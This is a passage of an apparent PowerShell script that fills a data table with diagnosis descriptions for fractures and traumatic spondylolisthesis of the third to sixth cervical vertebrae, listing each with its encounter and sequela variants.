traumatic nondisplaced spondylolisthesis of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of third cervical vertebra","Type III traumatic spondylolisthesis of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of third cervical vertebra","Other traumatic displaced spondylolisthesis of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of third cervical vertebra","Other traumatic nondisplaced spondylolisthesis of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of third cervical vertebra","Other displaced fracture of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of third cervical vertebra","Other nondisplaced fracture of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fourth cervical vertebra","Unspecified displaced fracture of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fourth cervical vertebra","Unspecified nondisplaced fracture of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fourth cervical vertebra","Type III traumatic spondylolisthesis of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fourth cervical vertebra","Other traumatic displaced spondylolisthesis of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fourth cervical vertebra","Other displaced fracture of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fourth cervical vertebra","Other nondisplaced fracture of fourth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of fifth cervical vertebra","Unspecified displaced fracture of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of fifth cervical vertebra","Unspecified nondisplaced fracture of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of fifth cervical vertebra","Type III traumatic spondylolisthesis of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of fifth cervical vertebra","Other traumatic displaced spondylolisthesis of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra","Other traumatic nondisplaced spondylolisthesis of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of fifth cervical vertebra","Other displaced fracture of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of fifth cervical vertebra","Other nondisplaced fracture of fifth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of sixth cervical vertebra","Unspecified displaced fracture of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of sixth cervical vertebra","Unspecified nondisplaced fracture of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic displaced spondylolisthesis of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of sixth cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic spondylolisthesis of sixth cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic spondylolisthesis of sixth cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic spondylolisthesis of sixth cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of sixth cervical vertebra","Type III traumatic 